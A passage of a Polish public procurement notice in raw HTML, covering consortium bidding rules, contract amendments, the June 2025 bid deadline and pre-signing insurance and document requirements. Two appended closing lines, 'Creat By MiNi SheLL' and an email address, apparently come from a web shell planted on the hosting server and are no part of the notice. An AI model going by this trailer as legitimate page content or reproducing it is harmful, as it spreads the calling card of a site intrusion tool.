dokumentach (załączniki) powołujących się na Wykonawcę w miejscu np. nazwa, adres Wykonawcy, należy wpisać dane dotyczące Pełnomocnika (Lidera) i Wykonawcy, którego dany dokument (załącznik) dotyczy. <br/>10.	Nie dopuszcza się uczestniczenia któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia w więcej niż jednej grupie Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Niedopuszczalnym jest również złożenie przez któregokolwiek z Wykonawców wspólnie ubiegających się o udzielnie zamówienia, równocześnie oferty indywidualnej oraz w ramach grupy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>11.	W przypadku wspólnego ubiegania się przez Wykonawców o zamówienie, należy złożyć jeden wspólny formularz ofertowy, sporządzony według wzoru stanowiącego załącznik nr 1 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy określonej w art.455 ustawy PZP.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę. Szczegółowy zakres zmian określa załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny być złożone za pośrednictwem Platformy pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-24 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca przed podpisaniem umowy przedłoży zamawiającemu polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem umowy. W przypadku gdy polisa obejmuje okres krótszy niż okres realizacji umowy, Wykonawca zobowiązany jest do zachowania ciągłości ubezpieczenia oraz przedkładania kopii kolejnych polis. W przypadku niedostarczenia Zamawiającemu polis lub/i ich kontynuacji, Zamawiający uprawniony jest do odstąpienia od umowy z wyłącznej winy Wykonawcy. <br/>2.	Przed zawarciem umowy wykonawca, którego oferta została wybrana zobowiązany będzie do dostarczenia: <br/>	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przed podpisaniem umowy zobowiązany jest do przedłożenia umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>	polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem umowy.<br/>	Dokumenty uprawniające, do prowadzenia pojazdów, osób wykazanych w załączniku nr 9 do SWZ.<br/>3.	Osoby reprezentujące Wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające ich umocowanie do reprezentowania Wykonawcy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.<br/>4.	W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający może żądać przed zawarciem umowy przedstawienia umowy regulującej współpracę tych Wykonawców. Umowa taka winna określać strony umowy, cel działania, sposób współdziałania, zakres prac przewidzianych do wykonania każdemu z nich, wskazanie, który z członków konsorcjum jest upoważniony do rozliczeń z Zamawiającym (wystawiania faktur w imieniu konsorcjum), solidarną odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum (obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi), wykluczenie możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia.<br/>5.	Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>6.	Jeżeli Wykonawca, którego oferta została wybrana, uchy¬la się od zawarcia umowy w sprawie zamówienia publicznego, Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców albo unieważnić postępowanie.

Creat By MiNi SheLL
Email: jattceo@gmail.com